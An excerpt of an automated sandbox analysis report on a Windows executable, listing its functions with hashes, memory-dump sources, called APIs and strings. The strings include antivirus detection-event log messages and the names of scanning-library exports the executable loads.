                                                • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                • Instruction ID: 0ef66192a08c96f70334001e251273d1a2624dcc2c0a5d00edda494235d47d44
                                                • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                • Instruction Fuzzy Hash: 35B15A73605B898BEB15CF29C89636C3BA0F748B9CF148921DB5D837A5CB39D461D708
                                                Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide
                                                • String ID:
                                                • API String ID: 203985260-0
                                                • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                Function 00007FFDAC08A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                • Instruction ID: b0c536d0d63251921301f6c9a719d4ada1723f3455c9473d39280d2c5cb17aef
                                                • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                • Instruction Fuzzy Hash: 6651D622B0978185EB309B71A8542AE7BA4FB40BE4F148134EE5C27B9ADF3CD421D70C
                                                Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: EntryFunctionLookup
                                                • String ID:
                                                • API String ID: 3852435196-0
                                                • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                Function 00007FFDAC08FD40 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                • Instruction ID: a19c88478e72874a165f17089b31f7b862f48a17d5e1cfae8d43cfdec99ca76e
                                                • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                • Instruction Fuzzy Hash: 76F06271B1A2958AEFA48F28A852B3977D0E7483D1F948039D69D83B14D73CD4609F0C
                                                Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                • API String ID: 1021822269-3147033232
                                                • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                                Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                • API String ID: 883923345-381368982
                                                • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                • String ID:
                                                • API String ID: 1613947383-0
                                                • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
